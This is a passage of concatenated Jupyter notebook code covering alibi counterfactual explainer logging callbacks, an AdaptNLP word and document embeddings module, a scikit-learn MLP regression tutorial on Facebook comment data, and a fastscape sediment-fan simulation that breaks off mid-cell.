coeff_sparsity=COEFF_SPARSITY,
coeff_consistency=COEFF_CONSISTENCY,
category_map=adult.category_map,
feature_names=adult.feature_names,
ranges=ranges,
immutable_features=immutable_features,
train_steps=TRAIN_STEPS,
batch_size=BATCH_SIZE,
backend="tensorflow")
# Fit the explainer.
explainer = explainer.fit(X=X_train)
```
#### Test explainer
```
# Select some positive examples.
X_positive = X_test[np.argmax(predictor(X_test), axis=1) == 1]
X = X_positive[:1000]
Y_t = np.array([0])
C = [{"Age": [0, 20], "Workclass": ["State-gov", "?", "Local-gov"]}]
# Generate counterfactual instances.
explanation = explainer.explain(X, Y_t, C)
# Concat labels to the original instances.
orig = np.concatenate(
[explanation.data['orig']['X'], explanation.data['orig']['class']],
axis=1
)
# Concat labels to the counterfactual instances.
cf = np.concatenate(
[explanation.data['cf']['X'], explanation.data['cf']['class']],
axis=1
)
# Define new feature names and category map by including the label.
feature_names = adult.feature_names + ["Label"]
category_map = deepcopy(adult.category_map)
category_map.update({feature_names.index("Label"): adult.target_names})
# Replace label encodings with strings.
orig_pd = pd.DataFrame(
apply_category_mapping(orig, category_map),
columns=feature_names
)
cf_pd = pd.DataFrame(
apply_category_mapping(cf, category_map),
columns=feature_names
)
orig_pd.head(n=10)
cf_pd.head(n=10)
```
#### Diversity
```
# Generate counterfactual instances.
X = X_positive[1].reshape(1, -1)
explanation = explainer.explain(X=X, Y_t=Y_t, C=C, diversity=True, num_samples=100, batch_size=10)
# Concat label column.
orig = np.concatenate(
[explanation.data['orig']['X'], explanation.data['orig']['class']],
axis=1
)
cf = np.concatenate(
[explanation.data['cf']['X'], explanation.data['cf']['class']],
axis=1
)
# Transfrom label encodings to string.
orig_pd = pd.DataFrame(
apply_category_mapping(orig, category_map),
columns=feature_names,
)
cf_pd = pd.DataFrame(
apply_category_mapping(cf, category_map),
columns=feature_names,
)
orig_pd.head(n=5)
cf_pd.head(n=5)
```
### Logging
Logging is clearly important when dealing with deep learning models. Thus, we provide an interface to write custom callbacks for logging purposes after each training step which we defined [here](../api/alibi.explainers.cfrl_base.rst#alibi.explainers.cfrl_base.Callback). In the following cells we provide some example to log in **Weights and Biases**.
#### Logging reward callback
```
class RewardCallback(Callback):
    """Log the mean counterfactual reward to Weights & Biases every 100 ticks.

    Depends on the notebook globals `predictor` and `wandb` — confirm both
    are defined before fitting with this callback.
    """

    def __call__(self,
                 step: int,
                 update: int,
                 model: CounterfactualRL,
                 sample: Dict[str, np.ndarray],
                 losses: Dict[str, float]):
        # Only log once every 100 combined step/update ticks.
        if (step + update) % 100 != 0:
            return
        # Get the target prediction and decode the counterfactual back to
        # the original input feature space.
        Y_t = sample["Y_t"]
        X_cf = model.params["decoder_inv_preprocessor"](sample["X_cf"])
        # Query the black-box predictor on the counterfactual.
        Y_m_cf = predictor(X_cf)
        # Mean batch reward as defined by the explainer's reward function.
        reward = np.mean(model.params["reward_func"](Y_m_cf, Y_t))
        wandb.log({"reward": reward})
```
#### Logging losses callback
```
class LossCallback(Callback):
    """Send the CFRL training losses to Weights & Biases every 100 ticks."""

    def __call__(self,
                 step: int,
                 update: int,
                 model: CounterfactualRL,
                 sample: Dict[str, np.ndarray],
                 losses: Dict[str, float]):
        # Skip all but every 100th combined step/update tick.
        if (step + update) % 100 != 0:
            return
        wandb.log(losses)
```
#### Logging tables callback
```
class TablesCallback(Callback):
    """Log input/counterfactual sample tables to Weights & Biases every 1000 steps.

    Depends on the notebook globals `heae_inv_preprocessor`, `predictor`,
    `adult` and `wandb` — confirm they are defined before fitting.
    """

    def __call__(self,
                 step: int,
                 update: int,
                 model: CounterfactualRL,
                 sample: Dict[str, np.ndarray],
                 losses: Dict[str, float]):
        # Log every 1000 steps
        if step % 1000 != 0:
            return
        # Define number of samples to be displayed.
        NUM_SAMPLES = 5
        # Decode inputs and counterfactuals back to the original feature space.
        X = heae_inv_preprocessor(sample["X"][:NUM_SAMPLES])        # input instance
        X_cf = heae_inv_preprocessor(sample["X_cf"][:NUM_SAMPLES])  # counterfactual
        # Collapse one-hot / probability vectors to integer class columns.
        Y_m = np.argmax(sample["Y_m"][:NUM_SAMPLES], axis=1).astype(int).reshape(-1, 1)    # input labels
        Y_t = np.argmax(sample["Y_t"][:NUM_SAMPLES], axis=1).astype(int).reshape(-1, 1)    # target labels
        Y_m_cf = np.argmax(predictor(X_cf), axis=1).astype(int).reshape(-1, 1)             # counterfactual labels
        # Define feature names and category map for input.
        feature_names = adult.feature_names + ["Label"]
        category_map = deepcopy(adult.category_map)
        category_map.update({feature_names.index("Label"): adult.target_names})
        # Construct input array.
        inputs = np.concatenate([X, Y_m], axis=1)
        inputs = pd.DataFrame(apply_category_mapping(inputs, category_map),
                              columns=feature_names)
        # Define feature names and category map for counterfactual output
        # (the output table carries an extra "Target" column).
        feature_names += ["Target"]
        category_map.update({feature_names.index("Target"): adult.target_names})
        # Construct output array.
        outputs = np.concatenate([X_cf, Y_m_cf, Y_t], axis=1)
        outputs = pd.DataFrame(apply_category_mapping(outputs, category_map),
                               columns=feature_names)
        # Log table.
        wandb.log({
            "Input": wandb.Table(dataframe=inputs),
            "Output": wandb.Table(dataframe=outputs)
        })
```
Having defined the callbacks, we can define a new explainer that will include logging.
```python
import wandb
# Initialize wandb.
wandb_project = "Adult Census Counterfactual with Reinforcement Learning"
wandb.init(project=wandb_project)
# Define explainer as before and include callbacks.
explainer = CounterfactualRLTabular(...,
callbacks=[LossCallback(), RewardCallback(), TablesCallback()])
# Fit the explainers.
explainer = explainer.fit(X=X_train)
# Close wandb.
wandb.finish()
```
| github_jupyter |
```
# default_exp inference.embeddings
```
# Embeddings
> AdaptNLP Embeddings Module
```
#hide
from nbverbose.showdoc import *
from fastcore.test import test_eq
from fastcore.xtras import is_listy
#export
import logging, torch
from typing import List, Dict, Union
from fastcore.basics import listify
from collections import defaultdict, OrderedDict
from fastcore.basics import mk_class
from fastcore.xtras import dict2obj
from fastcore.dispatch import typedispatch
from flair.data import Sentence
from flair.embeddings import (
Embeddings,
WordEmbeddings,
StackedEmbeddings,
FlairEmbeddings,
DocumentPoolEmbeddings,
DocumentRNNEmbeddings,
TransformerWordEmbeddings,
)
from adaptnlp.model_hub import FlairModelResult, HFModelResult, HFModelHub, FlairModelHub
from adaptnlp.result import SentenceResult, DetailLevel
#export
_flair_hub = FlairModelHub()
_hf_hub = HFModelHub()
#export
logger = logging.getLogger(__name__)
#exporti
@typedispatch
def _make_sentences(text:str, as_list=False) -> Union[List[Sentence], Sentence]:
    "Wrap a raw string in a Flair `Sentence` (inside a one-element list when `as_list`)"
    return [Sentence(text)] if as_list else Sentence(text)
#hide
test_sentences = 'a,b,c'.split(',')
out = [_make_sentences(o) for o in test_sentences]
tst_out = [Sentence('a'), Sentence('b'), Sentence('c')]
for o,t in zip(out, tst_out):
test_eq(o[0].text, t[0].text)
#exporti
@typedispatch
def _make_sentences(text:list, as_list=False) -> Union[List[Sentence], Sentence]:
    """Convert a list of strings and/or Flair `Sentence`s into a list of `Sentence`s.

    Each element is converted individually, so mixed str/`Sentence` lists
    are supported (previously a mixed list fell through both `all()`
    branches and silently returned `None`). Raises `TypeError` for
    unsupported element types instead of returning `None`.
    """
    sentences = []
    for t in text:
        if isinstance(t, Sentence):
            # Already a Sentence: pass it through unchanged.
            sentences.append(t)
        elif isinstance(t, str):
            sentences.append(Sentence(t))
        else:
            raise TypeError(f"Cannot build a Sentence from element of type {type(t).__name__}")
    return sentences
#hide
test_sentence = 'My name is Zach'
out = _make_sentences(test_sentence, as_list=True)
tst_out = [Sentence(test_sentence)]
for o,t in zip(out, tst_out):
test_eq(o[0].text, t[0].text)
test_eq(is_listy(out), True)
#exporti
@typedispatch
def _make_sentences(text:Sentence, as_list=False) -> Union[List[Sentence], Sentence]:
    "Pass a `Sentence` through unchanged (inside a one-element list when `as_list`)"
    return [text] if as_list else text
#hide
test_sentence = Sentence('Me')
out = _make_sentences(test_sentence)
test_eq(test_sentence[0].text, out[0].text)
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:HFModelResult) -> TransformerWordEmbeddings:
    "Build transformer word embeddings from a HuggingFace model-hub search result"
    return TransformerWordEmbeddings(model_name_or_path.name)
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:FlairModelResult) -> Union[FlairEmbeddings, WordEmbeddings]:
    """Build Flair word embeddings from a Flair model-hub search result.

    Tries classic `WordEmbeddings` first and falls back to contextual
    `FlairEmbeddings` when the name is not a classic embedding key.
    """
    nm = model_name_or_path.name
    # Remove only the literal 'flairNLP/' organization prefix. The previous
    # `nm.strip('flairNLP/')` treated its argument as a CHARACTER SET and
    # could eat legitimate leading/trailing characters of the model name
    # (e.g. 'flairNLP/nl' -> 'n').
    if nm.startswith('flairNLP/'):
        nm = nm[len('flairNLP/'):]
    try:
        return WordEmbeddings(nm)
    except Exception:
        return FlairEmbeddings(nm)
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:str) -> Union[TransformerWordEmbeddings, WordEmbeddings, FlairEmbeddings]:
    """Resolve a model key or path to the appropriate embeddings class.

    Searches the Flair model hub first, then the HuggingFace hub.
    Raises `ValueError` when the key matches neither.
    """
    res = _flair_hub.search_model_by_name(model_name_or_path, user_uploaded=True)
    if len(res) < 1:
        # Not a Flair model; try the HuggingFace hub instead.
        res = _hf_hub.search_model_by_name(model_name_or_path, user_uploaded=True)
        if len(res) < 1:
            raise ValueError(f'Embeddings not found for the model key: {model_name_or_path}, check documentation or custom model path to verify specified model')
        else:
            return TransformerWordEmbeddings(res[0].name) # Returning the first should always be the non-fast option
    else:
        nm = res[0].name
        # Remove only the literal 'flairNLP/' organization prefix; the previous
        # `nm.strip('flairNLP/')` treated its argument as a character set and
        # could corrupt model names (e.g. 'flairNLP/nl' -> 'n').
        if nm.startswith('flairNLP/'):
            nm = nm[len('flairNLP/'):]
        try:
            return WordEmbeddings(nm)
        except Exception:
            return FlairEmbeddings(nm)
#export
class EmbeddingResult(SentenceResult):
    "A result class designed for Embedding models"
    def __init__(
        self,
        sentences:List[Sentence] # A list of Flair `Sentence`s
    ): super().__init__(sentences)

    @property
    def sentence_embeddings(self) -> OrderedDict:
        "All embeddings in `sentences` (if available)"
        # Maps sentence index -> pooled sentence-level embedding tensor.
        e = OrderedDict()
        for i,s in enumerate(self._sentences):
            e.update({i:s.get_embedding()})
        return e

    @property
    def token_embeddings(self) -> OrderedDict:
        "All embeddings from the individual tokens in `sentence` with original order in shape (n, embed_dim)"
        # NOTE(review): `res` collects one token-index -> embedding dict per
        # sentence, but only `e` (the dict for the LAST sentence) is returned.
        # Confirm whether `return res` was intended; callers (including
        # __repr__ and the notebook tests) currently index the returned dict
        # by token position, so changing this would affect them.
        res = []
        for s in self._sentences:
            e = OrderedDict()
            for i, tok in enumerate(s):
                e.update({
                    i: tok.get_embedding()})
            res.append(e)
        return e

    def to_dict(
        self,
        detail_level:DetailLevel=DetailLevel.Low # A level of detail to return
    ):
        "Returns `self` as a dictionary"
        o = OrderedDict()
        o.update({'inputs':self.inputs,
                 'sentence_embeddings':self.sentence_embeddings,
                 'token_embeddings':self.token_embeddings})
        # NOTE(review): detail_level is compared against plain strings below —
        # assumes DetailLevel members compare equal to 'low'/'medium'/'high';
        # verify against the DetailLevel definition.
        if detail_level == "low": return o
        if detail_level == 'medium' or detail_level == 'high':
            # Return embeddings/word pairs and indices, and the tokenized input
            for s in self._sentences:
                o.update({
                    tok.text:{
                        'embeddings':tok.get_embedding(),
                        'word_idx':tok.idx
                    } for tok in s
                })
            o.update({
                'tokenized_inputs':self.tokenized_inputs
            })
        if detail_level == 'high':
            # Return embeddings/word pairs, indices, and the original Sentences objects
            for s in self._sentences:
                o.update({tok.text:{
                    'embeddings':tok.get_embedding(),
                    'word_idx':tok.idx
                } for tok in s})
            o.update({'sentences':self._sentences})
        return o

    def __repr__(self):
        # Pretty-print the inputs plus the shapes of all stored embeddings.
        s = f"{self.__class__.__name__}:" + " {"
        s += f'\n\tInputs: {self.inputs}'
        if self.token_embeddings is not None: s += f'\n\tToken Embeddings Shapes: {[self.token_embeddings[i].shape for i in range(len(self.token_embeddings))]}'
        if self.sentence_embeddings is not None: s += f'\n\tSentence Embeddings Shapes: {[self.sentence_embeddings[i].shape for i in range(len(self.sentence_embeddings))]}'
        return s + '\n}'
show_doc(EmbeddingResult.sentence_embeddings)
show_doc(EmbeddingResult.token_embeddings)
show_doc(EmbeddingResult.to_dict)
#export
class EasyWordEmbeddings:
    """Word embeddings from the latest language models

    Usage:

    ```python
    >>> embeddings = adaptnlp.EasyWordEmbeddings()
    >>> embeddings.embed_text("text you want embeddings for", model_name_or_path="bert-base-cased")
    ```
    """
    def __init__(self):
        # Cache of instantiated embedding models, keyed by the model
        # name/path (or model-result object) the caller passed in.
        self.models: Dict[str, Embeddings] = defaultdict(bool)

    def embed_text(
        self,
        text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
        model_name_or_path: Union[str, HFModelResult, FlairModelResult] = "bert-base-cased", # The hosted model name key, model path, or an instance of either `HFModelResult` or `FlairModelResult`
        detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
        raw:bool=False # Whether to return the raw outputs
    ) -> List[EmbeddingResult]: # A list of either `EmbeddingResult`s or dictionaries with information
        "Produces embeddings for text"
        # Convert into sentences
        sentences = _make_sentences(text)
        # Load the correct Embeddings module lazily and cache it for reuse.
        if model_name_or_path not in self.models.keys():
            self.models[model_name_or_path] = _get_embedding_model(model_name_or_path)
        embedding = self.models[model_name_or_path]
        embeds = embedding.embed(sentences)
        if raw:
            # Raw mode returns the embedded Flair sentences themselves so
            # `embed_all` can chain several models over the same text.
            return listify(embeds)
        res = EmbeddingResult(listify(embeds))
        return res.to_dict(detail_level) if detail_level is not None else res

    def embed_all(
        self,
        text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
        model_names_or_paths:List[str] = None, # A list of model names; defaults to every model already loaded
        detail_level:DetailLevel=DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
    ) -> List[EmbeddingResult]: # A list of either `EmbeddingResult`s or dictionaries with information
        "Embeds text with all embedding models loaded"
        # Convert into sentences
        sentences = _make_sentences(text)
        # Fall back to every cached model when no explicit list is given.
        # (`None` default replaces the previous mutable `[]` default; the
        # list() copy also guards against the dict changing during iteration.)
        if not model_names_or_paths:
            model_names_or_paths = list(self.models.keys())
        # Embed with each model in turn; embeddings accumulate on the same
        # Sentence objects, producing concatenated representations.
        for embedding_name in model_names_or_paths:
            sentences = self.embed_text(
                sentences, model_name_or_path=embedding_name, raw=True
            )
        res = EmbeddingResult(listify(sentences))
        return res.to_dict(detail_level) if detail_level is not None else res
#hide
import torch
embeddings = EasyWordEmbeddings()
res = embeddings.embed_text("text you want embeddings for", model_name_or_path="bert-base-cased")
test_eq(res['token_embeddings'][0].shape, torch.Size([768]))
show_doc(EasyWordEmbeddings.embed_text)
#hide
res = embeddings.embed_all(['text you want embeddings for', 'My name is Zach'],
['bert-base-cased', 'xlnet-base-cased'])
test_eq(res['token_embeddings'][0].shape, torch.Size([1536]))
show_doc(EasyWordEmbeddings.embed_all)
#export
class EasyStackedEmbeddings:
    "Word Embeddings that have been concatenated and 'stacked' as specified by Flair"
    def __init__(
        self,
        *embeddings: str # Variable number of model name keys or paths to stack
    ):
        print("May need a couple moments to instantiate...")
        self.embedding_stack = []
        # Load correct Embeddings module for each requested model.
        for model_name_or_path in embeddings:
            self.embedding_stack.append(_get_embedding_model(model_name_or_path))
        # At least one embedding model must be supplied.
        assert len(self.embedding_stack) != 0
        self.stacked_embeddings = StackedEmbeddings(embeddings=self.embedding_stack)

    def embed_text(
        self,
        text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
        detail_level:DetailLevel = DetailLevel.Low # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
    ) -> List[EmbeddingResult]: # A list of either EmbeddingResult's or dictionaries with information
        "Stacked embeddings"
        # Convert into sentences
        sentences = _make_sentences(text, as_list=True)
        # Unlike flair embeddings modules, stacked embeddings do not return a
        # list of sentences — they embed the passed-in sentences in place.
        self.stacked_embeddings.embed(sentences)
        res = EmbeddingResult(listify(sentences))
        return res.to_dict(detail_level) if detail_level is not None else res
#hide
embeddings = EasyStackedEmbeddings("bert-base-cased", "xlnet-base-cased")
sentences = embeddings.embed_text("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(sentences['token_embeddings'][0].shape, torch.Size([1536]))
show_doc(EasyStackedEmbeddings.embed_text)
#export
class EasyDocumentEmbeddings:
    "Document Embeddings generated by pool and rnn methods applied to the word embeddings of text"
    # Valid entries for the `methods` argument / config keys, used for validation below.
    __allowed_methods = ["rnn", "pool"]
    __allowed_configs = ("pool_configs", "rnn_configs")

    def __init__(
        self,
        *embeddings: str, # Variable number of strings referring to model names or paths
        methods: List[str] = ["rnn", "pool"], # A list of strings to specify which document embeddings to use i.e. ["rnn", "pool"] (avoids unncessary loading of models if only using one)
        configs: Dict = {
            "pool_configs": {"fine_tune_mode": "linear", "pooling": "mean"},
            "rnn_configs": {
                "hidden_size": 512,
                "rnn_layers": 1,
                "reproject_words": True,
                "reproject_words_dimension": 256,
                "bidirectional": False,
                "dropout": 0.5,
                "word_dropout": 0.0,
                "locked_dropout": 0.0,
                "rnn_type": "GRU",
                "fine_tune": True,
            },
        }, # A dictionary of configurations for flair's rnn and pool document embeddings
    ):
        # NOTE(review): `methods` and `configs` are mutable default arguments.
        # They are only read here (never mutated), so this is safe in practice,
        # but consider `None` sentinels if that ever changes. Also note that a
        # caller-supplied `configs` missing a key will leave the corresponding
        # self.pool_configs/self.rnn_configs attribute unset — confirm callers
        # always pass both keys when overriding.
        print("May need a couple moments to instantiate...")
        self.embedding_stack = []

        # Check methods
        for m in methods:
            assert m in self.__class__.__allowed_methods

        # Set configs for pooling and rnn parameters
        # (stored as self.pool_configs / self.rnn_configs for use below).
        for k, v in configs.items():
            assert k in self.__class__.__allowed_configs
            setattr(self, k, v)

        # Load correct Embeddings module for each requested model.
        for model_name_or_path in embeddings:
            self.embedding_stack.append(_get_embedding_model(model_name_or_path))

        # At least one word-embedding model must be supplied.
        assert len(self.embedding_stack) != 0
        if "pool" in methods:
            self.pool_embeddings = DocumentPoolEmbeddings(
                self.embedding_stack, **self.pool_configs
            )
            print("Pooled embedding loaded")
        if "rnn" in methods:
            self.rnn_embeddings = DocumentRNNEmbeddings(
                self.embedding_stack, **self.rnn_configs
            )
            print("RNN embeddings loaded")

    def embed_pool(
        self,
        text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
        detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
    ) -> List[EmbeddingResult]: # A list of either EmbeddingResult's or dictionaries with information
        "Generate stacked embeddings with `DocumentPoolEmbeddings`"
        # Sentences are embedded in place by the pooling document embedder.
        sentences = _make_sentences(text, as_list=True)
        self.pool_embeddings.embed(sentences)
        res = EmbeddingResult(listify(sentences))
        return res.to_dict(detail_level) if detail_level is not None else res

    def embed_rnn(
        self,
        text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
        detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
    ) -> List[Sentence]: # A list of either EmbeddingResult's or dictionaries with information
        "Generate stacked embeddings with `DocumentRNNEmbeddings`"
        # Sentences are embedded in place by the RNN document embedder.
        sentences = _make_sentences(text, as_list=True)
        self.rnn_embeddings.embed(sentences)
        res = EmbeddingResult(listify(sentences))
        return res.to_dict(detail_level) if detail_level is not None else res
#hide
embeddings = EasyDocumentEmbeddings("bert-base-cased", "xlnet-base-cased")
res = embeddings.embed_pool("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(res['sentence_embeddings'][0].shape, torch.Size([1536]))
#hide
res = embeddings.embed_rnn("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(res['sentence_embeddings'][0].shape, torch.Size([512]))
show_doc(EasyDocumentEmbeddings.embed_pool)
show_doc(EasyDocumentEmbeddings.embed_rnn)
```
| github_jupyter |
# Multilayer Perceptrons with scikit-learn
**XBUS-512: Introduction to AI and Deep Learning**
In this exercise, we will see how to build a preliminary neural model using the familiar scikit-learn library. While scikit-learn is not a deep learning library, it does provide basic implementations of the multilayer perceptron (MLP) for both classification and regression.
Thanks to [this team](https://github.com/Wall-eSociety/CommentVolumeML) for figuring out the labels for this dataset!
## Imports
```
import os
import time
import pickle
import zipfile
import requests
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split as tts
from sklearn.neural_network import MLPClassifier, MLPRegressor
from yellowbrick.regressor import PredictionError, ResidualsPlot
```
## Download the data
```
def fetch_data(url, fname):
    """
    Helper method to retrieve the data from the UCI ML Repository.

    Downloads `url` and writes the response body to `fname`.
    Returns the absolute path of the file written.
    Raises `requests.HTTPError` on a non-2xx response.
    """
    response = requests.get(url)
    # Fail loudly instead of silently saving an HTML error page as the dataset.
    response.raise_for_status()
    outpath = os.path.abspath(fname)
    with open(outpath, "wb") as f:
        f.write(response.content)
    return outpath
# Fetch and unzip the data, then load the training CSV into a DataFrame.
FIXTURES = os.path.join("..", "fixtures")
if not os.path.exists(FIXTURES):
    os.makedirs(FIXTURES)
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/00363/Dataset.zip"
ZIPPED_FILES = "facebook_data.zip"
UNZIPPED_FILES = "facebook_data"
# Download the archive and extract everything next to it.
zipped_data = fetch_data(URL, os.path.join(FIXTURES, ZIPPED_FILES))
with zipfile.ZipFile(os.path.join(FIXTURES, ZIPPED_FILES), "r") as zfiles:
    zfiles.extractall(os.path.join(FIXTURES, UNZIPPED_FILES))
# The CSV ships with no header row, so column names are assigned below.
data = pd.read_csv(
    os.path.join(
        FIXTURES,
        UNZIPPED_FILES,
        "Dataset",
        "Training",
        "Features_Variant_2.csv"
    ),
    header=None
)
# 54 columns: page stats, 25 derived features, comment counts (cc_*),
# post metadata, day-of-week one-hots, and the target (comment volume).
data.columns = [
    "likes", "views", "returns", "category", "derived_1", "derived_2", "derived_3",
    "derived_4", "derived_5", "derived_6", "derived_7", "derived_8", "derived_9",
    "derived_10", "derived_11", "derived_12", "derived_13", "derived_14", "derived_15",
    "derived_16", "derived_17", "derived_18", "derived_19", "derived_20", "derived_21",
    "derived_22", "derived_23", "derived_24", "derived_25", "cc_1", "cc_2", "cc_3",
    "cc_4", "cc_5", "base_time", "length", "shares", "status", "h_local", "sunday_post",
    "monday_post", "tuesday_post", "wednesday_post", "thursday_post", "friday_post",
    "saturday_post", "sunday_base", "monday_base", "tuesday_base", "wednesday_base",
    "thursday_base", "friday_base", "saturday_base", "target"
]
data.describe()
def prepare_for_regression(dataframe):
    """
    Prepare the data for a regression problem where we will attempt
    to regress the number of comments that a Facebook post will get
    given other features of the data.

    Returns a tuple containing an nd array of features (X)
    and a 1d array for the target (y)
    """
    days = ["sunday", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday"]
    # Every column except the comment-volume target is a feature.
    features = (
        ["likes", "views", "returns", "category"]
        + ["derived_{}".format(i) for i in range(1, 26)]
        + ["cc_{}".format(i) for i in range(1, 6)]
        + ["base_time", "length", "shares", "status", "h_local"]
        + ["{}_post".format(d) for d in days]
        + ["{}_base".format(d) for d in days]
    )
    # MLP is sensitive to feature scaling!
    X = MinMaxScaler().fit_transform(dataframe[features].values)
    y = dataframe["target"].values
    return X, y
def prepare_for_classification(dataframe):
    """
    Prepare the data for a classification problem where we will attempt
    to predict the category of a Facebook post given features of the data.

    Returns a tuple containing an nd array of features (X)
    and a 1d array for the target (y)
    """
    days = ["sunday", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday"]
    # Same feature set as regression, except "category" becomes the label and
    # the comment volume ("target") is used as a feature instead.
    features = (
        ["likes", "views", "returns"]
        + ["derived_{}".format(i) for i in range(1, 26)]
        + ["cc_{}".format(i) for i in range(1, 6)]
        + ["base_time", "length", "shares", "status", "h_local"]
        + ["{}_post".format(d) for d in days]
        + ["{}_base".format(d) for d in days]
        + ["target"]
    )
    # MLP is sensitive to feature scaling!
    X = MinMaxScaler().fit_transform(dataframe[features].values)
    y = dataframe["category"].values
    return X, y
# Prepare the data and break into training and test splits (80/20, fixed seed
# so the split is reproducible across runs).
X, y = prepare_for_regression(data)
X_train, X_test, y_train, y_test = tts(X, y, test_size=0.2, random_state=42)
```
## Instantiate the model, set hyperparameters, and train
```
# Train an MLP regressor with three hidden layers and time the fit.
start = time.time()
model = MLPRegressor(
    hidden_layer_sizes=(100, 50, 25),  # three progressively narrower hidden layers
    activation="relu",
    solver="adam",
    batch_size=2,  # very small batches: many weight updates per epoch, slow wall-clock
    max_iter=100,
    verbose=True
)
model.fit(X_train, y_train)
print("Training took {} seconds".format(
    time.time() - start
))
# Report RMSE on both splits to gauge over/underfitting.
pred_train = model.predict(X_train)
print("Training error: {}".format(
    np.sqrt(mean_squared_error(y_train, pred_train))
))
pred = model.predict(X_test)
print("Test error: {}".format(
    np.sqrt(mean_squared_error(y_test, pred))
))
```
## Visualize the results using Yellowbrick
```
# Predicted-vs-actual scatter with a 45-degree identity line for reference.
visualizer = PredictionError(model)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
# Residuals-vs-predicted plot; structure in the residuals suggests model bias.
visualizer = ResidualsPlot(model)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
```
## Pickle the model
```
# Persist the trained model so it can be reloaded later without retraining.
RESULTS = os.path.join("..", "results")
os.makedirs(RESULTS, exist_ok=True)  # idempotent; replaces the exists()/makedirs() check
filename = os.path.join(RESULTS, "sklearn_model.pkl")
# Use a context manager so the file handle is flushed and closed deterministically
# (the original `pickle.dump(model, open(...))` leaked the handle).
with open(filename, "wb") as f:
    pickle.dump(model, f)
```
## Restore the model and run live predictions
```
# Reload the pickled model and sanity-check a single live prediction.
# Context manager closes the file handle the original `pickle.load(open(...))` leaked.
with open(filename, "rb") as f:
    unpickled_model = pickle.load(f)
new_prediction = unpickled_model.predict(X_test[10].reshape(1, -1))
print("Predicted value: ", new_prediction[0])
print("Actual value: ", y_test[10])
```
## Takeaways from our scikit-learn prototype:
- sklearn API is convenient
- can tune some hyperparams
- easy to visualize & diagnose with Yellowbrick
- tough to tune for overfit model... would be nice to have dropout, for instance
- sloooooow
| github_jupyter |
# Evolution of a fan
This notebook reproduces the [fan example](https://fastscape-lem.github.io/fastscapelib-fortran/#_fan_f90) provided in the fastscapelib-fortran library. It illustrates continental transport/deposition.
```
import numpy as np
import xsimlab as xs
import matplotlib.pyplot as plt
import fastscape
%matplotlib inline
print('xarray-simlab version: ', xs.__version__)
print('fastscape version: ', fastscape.__version__)
```
## Import, customize and inspect the model
A sediment model is available in [fastscape](https://fastscape.readthedocs.io/en/latest/).
```
from fastscape.models import sediment_model
```
We want to model the evolution of a passive escarpment, thus with no uplift.
```
from fastscape.processes import Escarpment
# Customize the stock sediment model: drop tectonic uplift (passive margin)
# and use an escarpment as the initial topography.
model = (sediment_model
         .drop_processes('uplift')
         .update_processes({'init_topography': Escarpment}))
model
model.visualize(show_inputs=True)  # render the process graph with its inputs
```
## Model setup
```
# Simulation setup: 4e5 yr total. 'time' is the master (computation) clock at
# 2e3-yr steps; 'out' is a coarser clock used only for saving snapshots.
in_ds = xs.create_setup(
    model=model,
    clocks={
        'time': np.arange(0, 4e5 + 2e3, 2e3),
        'out': np.arange(0, 4e5 + 4e3, 4e3),
    },
    master_clock='time',
    input_vars={
        'grid__shape': [101, 201],
        'grid__length': [1e4, 2e4],  # 10 x 20 km domain
        # NOTE(review): side order of these statuses (left/right/top/bottom)
        # should be confirmed against the fastscape docs.
        'boundary__status': ['fixed_value', 'core', 'looped', 'looped'],
        # Escarpment initial topography: step from 0 m to 1000 m at x = 1e4.
        'init_topography': {
            'x_left': 1e4,
            'x_right': 1e4,
            'elevation_left': 0.,
            'elevation_right': 1e3
        },
        'flow__slope_exp': 1.,
        # Stream-power law incl. deposition (g coefficients enable transport-limited behavior).
        'spl': {
            'k_coef_bedrock': 1e-4,
            'k_coef_soil': 1.5e-4,
            'g_coef_bedrock': 1.,
            'g_coef_soil': 1.,
            'area_exp': 0.4,
            'slope_exp': 1.
        },
        # Hillslope diffusion, slightly more efficient for soil than bedrock.
        'diffusion': {
            'diffusivity_bedrock': 1e-2,
            'diffusivity_soil': 1.5e-2
        }
    },
    output_vars={
        'topography__elevation': 'out',
        'erosion__rate': 'out'
    }
)
in_ds
```
## Run the model
```
# Run the simulation with a progress bar; results come back as an xarray Dataset.
with xs.monitoring.ProgressBar():
    out_ds = in_ds.xsimlab.run(model=model)
out_ds
```
## Plot the outputs
The following plots (total erosion/deposition rate, drainage area and topography cross-section) highlight the dynamics on the left area (depositional) and its interaction with the right area (erosional).
```
import hvplot.xarray
import holoviews as hv
from xshade import hillshade
# Erosion/deposition rate map with a diverging colormap centered on zero.
# NOTE(review): sign convention (erosion vs deposition) inferred — confirm.
erosion_plot = out_ds.erosion__rate.hvplot.image(
    x='x', y='y', clim=(-2.5e-3, 2.5e-3),
    cmap=plt.cm.RdYlGn_r, groupby='out'
)
# Semi-transparent hillshade overlay gives topographic relief context.
hillshade_plot = hillshade(out_ds, 'out').hvplot.image(
    x='x', y='y', cmap=plt.cm.gray, alpha=0.4,
